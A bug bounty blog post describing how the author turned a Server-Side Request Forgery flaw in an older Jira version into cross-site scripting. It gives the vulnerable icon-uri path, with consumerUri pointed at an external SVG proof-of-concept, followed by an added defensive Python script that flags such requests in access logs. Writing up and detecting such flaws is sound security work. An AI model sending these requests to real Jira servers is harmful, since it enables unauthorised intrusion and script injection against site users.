How I converted SSRF to XSS in Jira.
I'm very much into bug bounty, and I spend my whole day doing this, finding new and interesting stuff, and I keep upgrading my recon techniques.
So this site was random and had a vast number of subdomains to test:
domain *.example.com
So I used some sites to find subdomains:
2. DnsDumpster
3. VirusTotal
Before I start: Acunetix does subdomain scans, so just set the timeout to 20 and you will get a really big list with banners and response headers. (It does half of the work for you.)
Now, I went through lots of subdomains, specifically looking for any Jira environment, and I found one.
Let's say wiki.example.com.
So I looked at the version and it was “5.8.13”, which is affected by SSRF ……
I remembered the “Alyssa Herrera” writeup on “Piercing the Veil: Server Side Request Forgery to NIPRNet access”,
so I quickly visited
“plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”
And boom, I got the Google page and I'm like
So I followed the writeup but couldn’t manage to get any sensitive info.
[Yes, I tried everything... nothing worked.]
And that’s where I was like “why, God? Why?”
And then suddenly it came to my mind, and I went to the Brute XSS blog,
copied “http://brutelogic.com.br/poc.svg”, and put it in place of https://google.com
and boom, I got XSS.
So it worked and I got a bounty of 50$, which is less (and that company sucks).
Anyways, it doesn’t matter at all; it was all about exploring, learning new things and gaining experience.
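For defenders, the requests described above show up in the web server's access log. The following is an added example, not part of the original post: it flags requests to the icon-uri endpoint whose consumerUri points at a host outside an allowlist, and marks SVG fetches separately. The log lines, the allowlist and the function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/plugins/servlet/oauth/users/icon-uri"
# Assumption: the only host this instance should ever fetch icons from.
ALLOWED_HOSTS = {"wiki.example.com"}

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com HTTP/1.1" 200 1234',
    '203.0.113.7 - - [01/Jan/2024:10:05:42 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:06:10 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://wiki.example.com/images/icon.png HTTP/1.1" 200 900',
    '198.51.100.4 - - [01/Jan/2024:10:06:11 +0000] "GET /dashboard.action HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def flag_icon_uri_requests(lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_ip, fetched_url, reason) for each suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes, so encoded URLs are compared in clear form.
        for value in parse_qs(target.query).get("consumerUri", []):
            fetched = urlsplit(value)
            if (fetched.hostname or "").lower() in allowed_hosts:
                continue
            # An SVG relayed from the wiki's own origin can carry script,
            # which is how the SSRF on this page became XSS.
            is_svg = fetched.path.lower().endswith(".svg")
            findings.append((line.split()[0], value,
                             "svg-content" if is_svg else "external-fetch"))
    return findings


if __name__ == "__main__":
    for finding in flag_icon_uri_requests(SAMPLE_LOG):
        print(finding)
```

Any hit on this endpoint with a non-allowlisted host is worth triage on an instance that has not been patched or had the endpoint blocked at the reverse proxy.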
#sharing is #caring
Hope you guys enjoyed it and learned something new. #[For those who don’t know; the rest are leets].
Thank you
./Logout
Follow me on Twitter: Ashish Kunwar
And if you have any questions, DM is open only for followers.